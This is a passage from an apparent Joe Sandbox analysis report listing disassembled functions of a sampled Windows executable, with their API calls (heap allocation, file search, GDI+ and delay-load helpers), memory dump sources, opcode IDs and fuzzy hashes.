                    • Instruction Fuzzy Hash: 1911E333A005259F9B21BE38DC91CEA73E5DB85321B164AA0EE54AB664DB30EC01C7D0
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: 666851c2a853ede8faa0a11c23aad7d8b9e116d33884d5e8d574bd45478a1092
                    • Instruction ID: 3af9052bbee3ba35ad514e510f988cf43057ecbc72dca49bade79232764e8173
                    • Opcode Fuzzy Hash: 666851c2a853ede8faa0a11c23aad7d8b9e116d33884d5e8d574bd45478a1092
                    • Instruction Fuzzy Hash: 021191369005299BCF21EE68C895ABEB7F5EF84710B0141A9F816B7341DB789D018B91
                    APIs
                    • __EH_prolog.LIBCMT ref: 00B7EBA7
                      • Part of subcall function 00B71983: _wcslen.LIBCMT ref: 00B71999
                      • Part of subcall function 00B68823: __EH_prolog.LIBCMT ref: 00B68828
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: H_prolog$_wcslen
                    • String ID:
                    • API String ID: 2838827086-0
                    • Opcode ID: 42601046e28d6f5060e2a4b02d69ad2100aa82377fc73b04cd3e39124f64fade
                    • Instruction ID: 4e3943d74af08de4481e01dafcd7b585da5f2f5b395c4c688bc976176fef0d6f
                    • Opcode Fuzzy Hash: 42601046e28d6f5060e2a4b02d69ad2100aa82377fc73b04cd3e39124f64fade
                    • Instruction Fuzzy Hash: 6211E3325092809FE705EB68AC56BEC7FE4AB15310F1081EEF198973A2DFF55640CB62
                    APIs
                      • Part of subcall function 00B8C2F6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B8A543,00000001,00000364,?,00B853FD,?,?,00BA30C4), ref: 00B8C337
                    • _free.LIBCMT ref: 00B8D6A5
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AllocateHeap_free
                    • String ID:
                    • API String ID: 614378929-0
                    • Opcode ID: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
                    • Instruction ID: 591c5c205f6e57254f332c6d0f44cf1ba432f763d5e09ee2f1f114c8a368f19a
                    • Opcode Fuzzy Hash: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
                    • Instruction Fuzzy Hash: 5101DBB22003495BE321AF59DC4195AFBE9EF95370F25055EE598532D0F630A805C774
                    APIs
                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B8A543,00000001,00000364,?,00B853FD,?,?,00BA30C4), ref: 00B8C337
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: ee42c39bb1dadf0479ae0499236c7919c2a41a8b5e850fe16bd3e96c706a49d2
                    • Instruction ID: c07193b337cdfd171e24868532a57ce7d7d0d2bfeaf36cfa99783f378d116fe1
                    • Opcode Fuzzy Hash: ee42c39bb1dadf0479ae0499236c7919c2a41a8b5e850fe16bd3e96c706a49d2
                    • Instruction Fuzzy Hash: 1AF0B471600125A6AB213E259D01A5A3FC8DF41761B14C092B809970B0DB30DD02D3F9
                    APIs
                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00B85594,?,0000015D,?,?,?,?,00B86A70,000000FF,00000000,?,?), ref: 00B8A830
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: 3161286bb6a1993f731ac1d9a090df5b304cbe4def24d58b853ee7a0904b789f
                    • Instruction ID: 599f016052876decc1084ce205737110cf12d0aa2656ddb62aa13daf4306f27a
                    • Opcode Fuzzy Hash: 3161286bb6a1993f731ac1d9a090df5b304cbe4def24d58b853ee7a0904b789f
                    • Instruction Fuzzy Hash: 27E06D3520162256F6313A66AC11B6B3AC8DB427A1F1501A3AD09A60B2DF20CC02C3F3
                    APIs
                    • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00B6A83D,?,?,?,?,?,00B9380F,000000FF), ref: 00B6A89B
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: ChangeCloseFindNotification
                    • String ID:
                    • API String ID: 2591292051-0
                    • Opcode ID: 037d2c46d00e847c6084031673c1ad6114c61dab7427b48514e745d56eb11acb
                    • Instruction ID: ad41cbd9f979a9b157df24b5dcce083fef965a3b0e4c74456bb168f82f2adeab
                    • Opcode Fuzzy Hash: 037d2c46d00e847c6084031673c1ad6114c61dab7427b48514e745d56eb11acb
                    • Instruction Fuzzy Hash: 02F0E230085B018FDF308B24C448792B3E4EB12329F040BDED1E3538E0D368698E8F41
                    APIs
                      • Part of subcall function 00B6BA94: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00B6B98B,000000FF,?,?), ref: 00B6BABD
                      • Part of subcall function 00B6BA94: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00B6B98B,000000FF,?,?), ref: 00B6BAEB
                      • Part of subcall function 00B6BA94: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00B6B98B,000000FF,?,?), ref: 00B6BAF7
                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B6B991
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Find$FileFirst$CloseErrorLast
                    • String ID:
                    • API String ID: 1464966427-0
                    • Opcode ID: c2d6984dc197717d6cf858741f70db70d44dad2076a88d25035fa7305439a503
                    • Instruction ID: faa54fceb824c82ee7b277247c078d61b7d80e328364d2e02e918e02285c26dc
                    • Opcode Fuzzy Hash: c2d6984dc197717d6cf858741f70db70d44dad2076a88d25035fa7305439a503
                    • Instruction Fuzzy Hash: 1EF08932008790AACA2217B44804FD77BE05F16335F008A89F2FE921D2C77850D59B21
                    APIs
                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00B7215D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: ExecutionStateThread
                    • String ID:
                    • API String ID: 2211380416-0
                    • Opcode ID: 50b62a010cc05d6072d4218954cccb092fdb501fa29b70e6fb5af242bf1c3448
                    • Instruction ID: 5354b54f6979e3e9e9fe4e57b87905c0f58178bc1af53cc8bc0f0622a6177e08
                    • Opcode Fuzzy Hash: 50b62a010cc05d6072d4218954cccb092fdb501fa29b70e6fb5af242bf1c3448
                    • Instruction Fuzzy Hash: E2D0121165C01052EA263338A856BBD1AD66FD7724F0940E7B21D67193CF98094392B1
                    APIs
                    • GdipAlloc.GDIPLUS(00000010), ref: 00B7B63C
                      • Part of subcall function 00B7B3C8: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B7B3E9
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Gdip$AllocBitmapCreateFromStream
                    • String ID:
                    • API String ID: 1915507550-0
                    • Opcode ID: 67c6c0b1a9f8045d953eebf11179e7c179da5fb7bf356439fdf6af47a3be8cb5
                    • Instruction ID: 1e517eb9952c1fc0688319586ae3d0ed7eefa27ca4c0be4f7ec17e33a9719bd2
                    • Opcode Fuzzy Hash: 67c6c0b1a9f8045d953eebf11179e7c179da5fb7bf356439fdf6af47a3be8cb5
                    • Instruction Fuzzy Hash: F3D0C73061420976DF416B618C02F7EB6D5DF10344F00C175BA69951D1EBF1DA606965
                    APIs
                    • DloadProtectSection.DELAYIMP ref: 00B7F76F
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: DloadProtectSection
                    • String ID:
                    • API String ID: 2203082970-0
                    • Opcode ID: ad79c3e12ddffd4be8995833c0adb773e4e65637f8b383d34850d3cd45784fdf
                    • Instruction ID: bfd4035fc6a95c54608f71b22d91e771d47c25b816430e2939ef4773fa8fd3a1
                    • Opcode Fuzzy Hash: ad79c3e12ddffd4be8995833c0adb773e4e65637f8b383d34850d3cd45784fdf
                    • Instruction Fuzzy Hash: 4DD01270544206B9C619EB749CC6B7422F0F30CB4BF90C5F5F66E831A1CF658D40862D
                    APIs
                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00B72E88), ref: 00B7EEE2
                      • Part of subcall function 00B7C758: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B7C769
                      • Part of subcall function 00B7C758: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B7C77A
                      • Part of subcall function 00B7C758: IsDialogMessageW.USER32(000104C2,?), ref: 00B7C78E
                      • Part of subcall function 00B7C758: TranslateMessage.USER32(?), ref: 00B7C79C
                      • Part of subcall function 00B7C758: DispatchMessageW.USER32(?), ref: 00B7C7A6
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                    • String ID:
                    • API String ID: 897784432-0
                    • Opcode ID: 8a944d0b9c3cac0b3545057e6ec8ed5e8fd3c57c8ec2c9167d9c756d84ab553d
                    • Instruction ID: 2d9de52b8a0b1ac4077982e928a0bb42bc125c067e571476cc5223cecfc8e682
                    • Opcode Fuzzy Hash: 8a944d0b9c3cac0b3545057e6ec8ed5e8fd3c57c8ec2c9167d9c756d84ab553d
                    • Instruction Fuzzy Hash: FCD09E31149200AAD7112B51DD06F0A7EE2BB9CB05F004599B299740B18A62AD219B52
                    APIs
                    • GetFileType.KERNELBASE(000000FF,00B6AA1E), ref: 00B6AB28
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: FileType
                    • String ID:
                    • API String ID: 3081899298-0
                    • Opcode ID: 043c133ab216df0baedfc96cb086eb9fbdb74e5e9a0354e3dc58434e4f562db8
                    • Instruction ID: 635fdace1b373d94de180ebcd75fe6e7d7f5032971cbc0e9d8fe92e8f2c3263a
                    • Opcode Fuzzy Hash: 043c133ab216df0baedfc96cb086eb9fbdb74e5e9a0354e3dc58434e4f562db8
                    • Instruction Fuzzy Hash: D2C08034000105C64E300A34D8640757763FA523757BC93D5C064D50A1C32B8C43ED03
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: e78495bd0f49e54fd6c38c1bfeac41851a46f5609eabbf82d276b0fdd8777d7d
                    • Instruction ID: 0b22969d059b4b7b0774224df8d45bc2c142b62b0d67d841f7bd16dc832666e2
                    • Opcode Fuzzy Hash: e78495bd0f49e54fd6c38c1bfeac41851a46f5609eabbf82d276b0fdd8777d7d
                    • Instruction Fuzzy Hash: 76B012932680037E364491162D4BF3602DCC5C0B10330C0FFF018C5041E4806D421039
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: c8bf87c2f122a05da928fa6ff380004bf15729ffcd554ca405ab8209b37164ff
                    • Instruction ID: f43db5a51156858b2bc0e70c941d47fc98707332ffdd44970bce30afef82dddd
                    • Opcode Fuzzy Hash: c8bf87c2f122a05da928fa6ff380004bf15729ffcd554ca405ab8209b37164ff
                    • Instruction Fuzzy Hash: 79B012832680037D764491552C4BF3603DCC5C0B10370C4FFF019C1141E4405C451039
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: b30a5cde890ca4d5a49c924f732a1011ddde21e207ee93edfe5a35833fa21b93
                    • Instruction ID: 121c1f88d58cb906576bee7969887000024f35b860f9c28bb78ad777c38bd2db
                    • Opcode Fuzzy Hash: b30a5cde890ca4d5a49c924f732a1011ddde21e207ee93edfe5a35833fa21b93
                    • Instruction Fuzzy Hash: BBB012932680037E364491152C4BF3A02DCC5C0B10330C0FFF418C1041E4406C411039
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 7c092261aa42a98ffb531ff60ed3a0cff7fe452532e37000b68793db9ab22896
                    • Instruction ID: 99c84f39ccb0835ea8428ddf90ec940a5e5baeae146bbadeddde77608da2fc5f
                    • Opcode Fuzzy Hash: 7c092261aa42a98ffb531ff60ed3a0cff7fe452532e37000b68793db9ab22896
                    • Instruction Fuzzy Hash: C7B012832680037D764491162D4BF3602DCC5C0B10330C0FFF018C5141E4905C4A2039
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 70ab97ca86ccb51dda1a8d6ad220e5ebe89eb9616a77686d5463d13949b1988a
                    • Instruction ID: be3d0e9348e26f32d898859c966881d5131fcaa5b7a6702dffaf0e62fab47d3c
                    • Opcode Fuzzy Hash: 70ab97ca86ccb51dda1a8d6ad220e5ebe89eb9616a77686d5463d13949b1988a
                    • Instruction Fuzzy Hash: F4B012832680037D764491152C4BF3A02DCC5C0B10330C0FFF418C1141E4405C451039
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
